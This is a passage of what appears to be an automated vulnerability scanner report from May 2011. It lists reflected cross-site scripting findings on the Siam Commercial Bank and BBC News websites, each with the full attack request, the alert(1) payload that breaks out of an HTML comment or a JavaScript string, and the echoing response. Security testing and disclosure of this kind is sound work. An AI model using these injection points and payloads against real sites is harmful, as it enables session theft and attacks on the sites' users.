Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=ms381nomj10vb6ipcub0ta3jg4

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:33:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Wed, 03 Nov 2010 12:33:51 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 714

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/en/home/favicon.ico?1eab2--><script>alert(1)</script>41a3f37f580=1 -->
...[SNIP]...

5.149. http://www.scb.co.th/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload b81fb--><script>alert(1)</script>508f782dd38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.icob81fb--><script>alert(1)</script>508f782dd38 HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=pheig1kjk8ik69qvdja76e1mm0; _cbclose=1; _cbclose8098=1; _uid8098=5CC397F4.1; _ctout8098=1; __utmz=37298082.1304443497.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Siam%20Commercial%20Bank; __utma=37298082.1832332674.1304443497.1304443497.1304443497.1; __utmc=37298082; __utmb=37298082.1.10.1304443497

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:23:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Wed, 03 Nov 2010 12:23:40 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 703

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/favicon.icob81fb--><script>alert(1)</script>508f782dd38 -->
...[SNIP]...

5.150. http://www.scb.co.th/landing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /landing.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload c3a43--><script>alert(1)</script>2ef873cd770 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /landing.htmlc3a43--><script>alert(1)</script>2ef873cd770 HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=spsstgpflpipnok67bbkcn9fl5; path=/
Expires: Wed, 03 Nov 2010 12:33:28 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 704

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/landing.htmlc3a43--><script>alert(1)</script>2ef873cd770 -->
...[SNIP]...

5.151. http://www.scb.co.th/scb_api/img/api/t1new/bttn_calc.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /scb_api/img/api/t1new/bttn_calc.gif

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload ad655--><script>alert(1)</script>bd77d5947fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /scb_apiad655--><script>alert(1)</script>bd77d5947fc/img/api/t1new/bttn_calc.gif HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/scb_api/scbapi.jsp?key=MjAwOTEyMTUxNjA5NDM=
Cookie: JSESSIONID=DFFDD5639AC9938E8A85EF30E5AB6808; _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 18:02:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=tv1of0k1k170498f068gjqukl5; path=/
Expires: Wed, 03 Nov 2010 18:02:36 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 727

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/scb_apiad655--><script>alert(1)</script>bd77d5947fc/img/api/t1new/bttn_calc.gif -->
...[SNIP]...

5.152. http://www.scb.co.th/scb_api/img/api/t1new/bttn_reset.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /scb_api/img/api/t1new/bttn_reset.gif

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 6c6f0--><script>alert(1)</script>3cbc9be325 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /scb_api6c6f0--><script>alert(1)</script>3cbc9be325/img/api/t1new/bttn_reset.gif HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/scb_api/scbapi.jsp?key=MjAwOTEyMTUxNjA5NDM=
Cookie: JSESSIONID=DFFDD5639AC9938E8A85EF30E5AB6808; _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 18:02:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=13mptp81rs4es1d9fitvsno043; path=/
Expires: Wed, 03 Nov 2010 18:02:37 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 727

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/scb_api6c6f0--><script>alert(1)</script>3cbc9be325/img/api/t1new/bttn_reset.gif -->
...[SNIP]...

5.153. http://www.scb.co.th/scb_api/scbapi.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /scb_api/scbapi.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 4acd4--><script>alert(1)</script>aee2cdd363e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /scb_api4acd4--><script>alert(1)</script>aee2cdd363e/scbapi.jsp?key=MjAwOTEyMTUxNjA5NDM= HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://moneytalk.scb.co.th/index.asp?FileName=TH&1=1
Cookie: _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 18:02:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=hp1ojivtnvl8t3t3jot1gckiv1; path=/
Expires: Wed, 03 Nov 2010 18:02:39 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 735

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/scb_api4acd4--><script>alert(1)</script>aee2cdd363e/scbapi.jsp?key=MjAwOTEyMTUxNjA5NDM= -->
...[SNIP]...

5.154. http://www.scb.co.th/stocks/media/00107f.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /stocks/media/00107f.swf

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7cbb8--><script>alert(1)</script>629dc1292c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /stocks7cbb8--><script>alert(1)</script>629dc1292c3/media/00107f.swf HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/en/home
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=pheig1kjk8ik69qvdja76e1mm0; _cbclose=1; _cbclose8098=1; _uid8098=5CC397F4.1; _ctout8098=1; __utmz=37298082.1304443497.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Siam%20Commercial%20Bank; __utma=37298082.1832332674.1304443497.1304443497.1304443497.1; __utmc=37298082; __utmb=37298082.1.10.1304443497

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:24:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Wed, 03 Nov 2010 12:24:15 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 715

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/stocks7cbb8--><script>alert(1)</script>629dc1292c3/media/00107f.swf -->
...[SNIP]...

5.155. http://www.scb.co.th/stocks/media/00107f.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /stocks/media/00107f.swf

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 5c7ce--><script>alert(1)</script>0e9e19f7438 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /stocks/media5c7ce--><script>alert(1)</script>0e9e19f7438/00107f.swf HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/en/home
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=pheig1kjk8ik69qvdja76e1mm0; _cbclose=1; _cbclose8098=1; _uid8098=5CC397F4.1; _ctout8098=1; __utmz=37298082.1304443497.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Siam%20Commercial%20Bank; __utma=37298082.1832332674.1304443497.1304443497.1304443497.1; __utmc=37298082; __utmb=37298082.1.10.1304443497

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:24:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Wed, 03 Nov 2010 12:24:17 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 715

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/stocks/media5c7ce--><script>alert(1)</script>0e9e19f7438/00107f.swf -->
...[SNIP]...

5.156. http://www.scb.co.th/stocks/media/00107f.swf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /stocks/media/00107f.swf

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 2a498--><script>alert(1)</script>efea3a69394 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /stocks/media/00107f.swf2a498--><script>alert(1)</script>efea3a69394 HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/en/home
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=pheig1kjk8ik69qvdja76e1mm0; _cbclose=1; _cbclose8098=1; _uid8098=5CC397F4.1; _ctout8098=1; __utmz=37298082.1304443497.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Siam%20Commercial%20Bank; __utma=37298082.1832332674.1304443497.1304443497.1304443497.1; __utmc=37298082; __utmb=37298082.1.10.1304443497

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:24:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Wed, 03 Nov 2010 12:24:19 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 715

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/stocks/media/00107f.swf2a498--><script>alert(1)</script>efea3a69394 -->
...[SNIP]...

5.157. http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /earth/hi/earth_news/newsid_9469000/9469456.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1637a'-alert(1)-'0ae01a55647 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /earth/hi/earth_news/newsid_9469000/9469456.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1637a'-alert(1)-'0ae01a55647

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:25:12 GMT
Keep-Alive: timeout=10, max=789
Expires: Tue, 03 May 2011 13:25:12 GMT
Connection: close
Set-Cookie: BBC-UID=44cdfcc010a283b8ddb0488bc14c79be89afffa7b0c051799b2b936ed8bd631a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:12 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=44cdfcc010a283b8ddb0488bc14c79be89afffa7b0c051799b2b936ed8bd631a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:12 GMT; path=/; domain=bbc.co.uk;
Content-Length: 43898

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>BBC - Earth News - GPS backpacks track NZ hedgehogs</title>
<meta na
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429112000,
       editionToServe: null,
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=1637a'-alert(1)-'0ae01a55647',
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'earthnews',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/earth/hi/earth_news/newsid_9469000/946945
...[SNIP]...

5.158. http://news.bbc.co.uk/go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e64d'-alert(1)-'ee4861ef742 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7e64d'-alert(1)-'ee4861ef742

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:25:21 GMT
Keep-Alive: timeout=10, max=786
Expires: Tue, 03 May 2011 13:25:21 GMT
Connection: close
Set-Cookie: BBC-UID=44ad6c605042841172655fa751439095a768d56f80605109db3bb3bf98e446ac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:21 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=44ad6c605042841172655fa751439095a768d56f80605109db3bb3bf98e446ac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:21 GMT; path=/; domain=bbc.co.uk;
Content-Length: 43898

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>BBC - Earth News - GPS backpacks track NZ hedgehogs</title>
<meta na
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429121000,
       editionToServe: null,
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=7e64d'-alert(1)-'ee4861ef742',
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'earthnews',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/earth/hi/earth_news/newsid_9469000/946945
...[SNIP]...

5.159. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cricket/13264093.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/cricket/13264093.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df73b'-alert(1)-'12beadca00b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/cricket/13264093.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=df73b'-alert(1)-'12beadca00b

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:25:27 GMT
Keep-Alive: timeout=10, max=799
Expires: Tue, 03 May 2011 13:25:27 GMT
Connection: close
Set-Cookie: BBC-UID=34ddcc70a032746743544d284111ce95bb077cadd0d011ba04db5a65bda056f40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=34ddcc70a032746743544d284111ce95bb077cadd0d011ba04db5a65bda056f40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 49277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429127000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=df73b'-alert(1)-'12beadca00b',
       section: 'sri-lanka',
       sectionPath: '/cricket',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13264093',
       assetType: 'story',
       uri: '/sport2/hi/cri
...[SNIP]...

5.160. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/13265403.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/football/13265403.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a276'-alert(1)-'ee3d9a5ed10 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/football/13265403.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7a276'-alert(1)-'ee3d9a5ed10

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:25:25 GMT
Keep-Alive: timeout=10, max=798
Expires: Tue, 03 May 2011 13:25:25 GMT
Connection: close
Set-Cookie: BBC-UID=f40dcc406052c4653d9c257541476fa6b32d897a9060b1099b5bb3cea0de34ac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:25 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=f40dcc406052c4653d9c257541476fa6b32d897a9060b1099b5bb3cea0de34ac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:25 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429125000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=7a276'-alert(1)-'ee3d9a5ed10',
       section: 'europe',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13265403',
       assetType: 'story',
       uri: '/sport2/hi/footb
...[SNIP]...

5.161. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/formula_one/13267766.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/formula_one/13267766.stm

Issue detail

